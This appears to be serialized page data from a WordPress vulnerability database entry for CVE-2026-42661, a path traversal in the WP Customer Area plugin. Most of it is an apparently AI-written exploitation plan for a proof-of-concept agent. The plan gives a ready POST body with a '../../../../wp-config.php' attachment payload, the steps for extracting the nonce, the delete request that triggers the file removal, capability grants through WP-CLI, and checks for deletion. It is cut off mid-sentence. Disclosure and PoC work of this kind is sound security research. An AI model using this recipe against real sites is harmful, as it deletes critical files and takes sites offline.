[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fPPODwOzLtSFc1IqVX-omrABOpNymckXwUKv3RrYbLEA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2026-42661","wp-customer-area-authenticated-custom-path-traversal","WP Customer Area \u003C= 8.3.4 - Authenticated (Custom+) Path Traversal","The WP Customer Area plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 8.3.4. 
This makes it possible for authenticated attackers, with Custom-level access and above, to perform actions on files outside of the originally intended directory.","customer-area",null,"\u003C=8.3.4","8.3.5","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-05-01 00:00:00","2026-05-04 13:47:11",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd731f7bf-d2de-4f5f-8c4a-627713bec348?source=api-prod",4,[22,23,24,25,26,27,28],"customer-area.php","readme.txt","src\u002Fphp\u002Fcore-addons\u002Fcapabilities\u002Fcapabilities-addon.class.php","src\u002Fphp\u002Fcore-addons\u002Finstaller\u002Finstaller-addon.class.php","src\u002Fphp\u002Fcore-addons\u002Finstaller\u002Ftemplates\u002Finstaller-part-setup-wizard.template.php","src\u002Fphp\u002Fcore-addons\u002Fprivate-file\u002Fprivate-file-default-handlers.class.php","src\u002Fphp\u002Fcore-classes\u002Faddon-edit-content-page.class.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-42661\n\n## 1. Vulnerability Summary\nThe **WP Customer Area** plugin (\u003C= 8.3.4) is vulnerable to an authenticated path traversal vulnerability. The flaw exists in the handling of private file attachments. When a user with sufficient privileges (Custom-level or above) creates or edits a \"Private File\" (`cuar_private_file`), they can specify attachment metadata. \n\nSpecifically, the plugin fails to sanitize the `file` path parameter when using certain attachment methods (like `ftp-folder` or `server`). When these attachments are later deleted—either individually or when the parent post is deleted—the plugin performs an `unlink()` operation on the path stored in metadata. By injecting traversal sequences (e.g., `..\u002F..\u002F..\u002F..\u002Fwp-config.php`), an attacker can cause the plugin to delete arbitrary files on the server.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: Frontend Private Content Editor (handled by `CUAR_AbstractEditContentPageAddOn`).\n- **Target Action**: `create` or `update` of a `cuar_private_file`, followed by a `delete` action.\n- **Vulnerable Parameter**: `cuar_attachments[index][file]`\n- **Required Authentication**: A user account with capabilities to manage private files (e.g., `cuar_publish_private_files` and `cuar_delete_private_files`). These are often assigned to the \"Custom\" role or can be granted to standard roles like Subscriber.\n- **Precondition**: The \"Private Files\" and \"Post Owner\" add-ons (built-in) must be active.\n\n## 3. Code Flow\n1. **Entry**: User submits a form to `?customer-area-page=customer-private-files&cuar_action=create`.\n2. **Processing**: `CUAR_AbstractEditContentPageAddOn::handle_form_submission()` is triggered.\n3. **Nonce Validation**: It verifies `cuar_customer-private-files_nonce` against the action `cuar_customer-private-files`.\n4. **Attachment Handling**: `do_edit_content()` calls filters to process attachments. `CUAR_PrivateFilesDefaultHandlers::attach_ftp_file` (or `attach_server_file`) is called via the `cuar\u002Fprivate-content\u002Ffiles\u002Fon-attach-file?method=ftp-folder` hook.\n5. **Storage**: The traversal string `..\u002F..\u002F..\u002F..\u002Fwp-config.php` is saved into the post's metadata (`_cuar_attachments`).\n6. **Triggering the Sink**: The user submits a request to delete the post: `?customer-area-page=customer-private-files&cuar_action=delete&post_id=ID&nonce=NONCE`.\n7. **Cleanup**: `CUAR_PrivateFilesDefaultHandlers::remove_orphan_local_files` (or `remove_attached_local_file`) is triggered during post deletion.\n8. **Sink**:\n   - It calls `$po_addon->get_private_file_path($filename, $post_id, false)`.\n   - `$filename` is retrieved from meta as `..\u002F..\u002F..\u002F..\u002Fwp-config.php`.\n   - The resulting path points to the WordPress root.\n   - `unlink($filepath)` is executed.\n\n## 4. 
Nonce Acquisition Strategy\nThe nonce is required for both creation and deletion of content. \n\n1. **Identify Page**: The \"Create Private File\" page must be accessible.\n2. **Setup**: The PoC agent should ensure a page with the creation shortcode exists.\n   - Command: `wp post create --post_type=page --post_title=\"Create File\" --post_content='[customer_area_create_private_file]' --post_status=publish`\n3. **Navigate**: Use `browser_navigate` to go to the newly created page as the authenticated user.\n4. **Extract Nonce**: The nonce is stored in a hidden input field or localized JS.\n   - Field name: `cuar_customer-private-files_nonce`\n   - Extraction: `browser_eval(\"document.getElementsByName('cuar_customer-private-files_nonce')[0].value\")`\n\n## 5. Exploitation Strategy\n### Step 1: Create the Malicious Private File\nSend a POST request to create a private file with a traversed attachment path.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Findex.php?customer-area-page=customer-private-files&cuar_action=create`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```\n  cuar_form_id=customer-private-files&\n  cuar_customer-private-files_nonce=[EXTRACTED_NONCE]&\n  cuar_do_register=1&\n  cuar_title=Exploit&\n  cuar_content=Exploit&\n  cuar_attachments[0][file]=..\u002F..\u002F..\u002F..\u002Fwp-config.php&\n  cuar_attachments[0][method]=ftp-folder&\n  cuar_attachments[0][source]=local\n  ```\n\n### Step 2: Retrieve the Post ID\nIdentify the ID of the newly created `cuar_private_file`. This can be done by parsing the redirect URL or using WP-CLI.\n\n### Step 3: Trigger File Deletion\nSend a request to delete the created post. 
The plugin will attempt to \"clean up\" the attachments.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Findex.php?customer-area-page=customer-private-files&cuar_action=delete&post_id=[ID]&nonce=[EXTRACTED_NONCE]`\n- **Method**: `GET` (or `POST` with `cuar_do_register=1` depending on the UI implementation)\n\n## 6. Test Data Setup\n1. **Target User**: Create a user with the `subscriber` role.\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2. **Grant Capabilities**: The plugin uses custom capabilities. Grant them to the subscriber.\n   - `wp cap add subscriber cuar_publish_private_files`\n   - `wp cap add subscriber cuar_delete_private_files`\n   - `wp cap add subscriber cuar_edit_private_files`\n3. **Create Dashboard**: Ensure the Customer Area dashboard is initialized.\n   - `wp eval \"current_user_can('manage_options'); (new CUAR_CustomerPagesAddOn())->create_all_missing_pages();\"`\n4. **Target File**: Ensure `wp-config.php` exists (standard in WP).\n\n## 7. Expected Results\n- After Step 1, a new post of type `cuar_private_file` is created. Its `_cuar_attachments` meta contains the path `..\u002F..\u002F..\u002F..\u002Fwp-config.php`.\n- After Step 3, the `unlink()` function is called on the constructed path: `[STORAGE_DIR]\u002F[POST_ID]\u002F..\u002F..\u002F..\u002F..\u002Fwp-config.php`.\n- Since `wp-content\u002Fuploads\u002Fcustomer-area\u002Fstorage\u002F[ID]\u002F..\u002F..\u002F..\u002F..\u002F` resolves to the WordPress root, `wp-config.php` is deleted.\n\n## 8. Verification Steps\n1. **Check for Deletion**:\n   - Command: `wp file exists wp-config.php`\n   - Expected Output: Error or confirmation that the file is missing.\n2. **Check Database**:\n   - Command: `wp post list --post_type=cuar_private_file`\n   - The exploit post should no longer exist.\n\n## 9. 
Alternative Approaches\nIf the `ftp-folder` method is restricted by server configurations:\n- **Try `method=server`**: If the \"Server Side Folders\" logic is active, use `cuar_attachments[0][method]=server` and `cuar_attachments[0][source]=server`.\n- **Direct Meta Update (if another vuln exists)**: If there is a separate vulnerability allowing arbitrary metadata updates, setting `_cuar_attachments` directly and then using the frontend \"Remove Attachment\" button (AJAX) would also trigger the `unlink`.\n- **Blind Deletion**: If the plugin does not provide feedback, use `","gemini-3-flash-preview","2026-05-04 17:38:36","2026-05-04 17:39:36",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","8.3.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-area\u002Ftags\u002F8.3.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-area.8.3.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-area\u002Ftags\u002F8.3.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-area.8.3.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-area\u002Ftags"]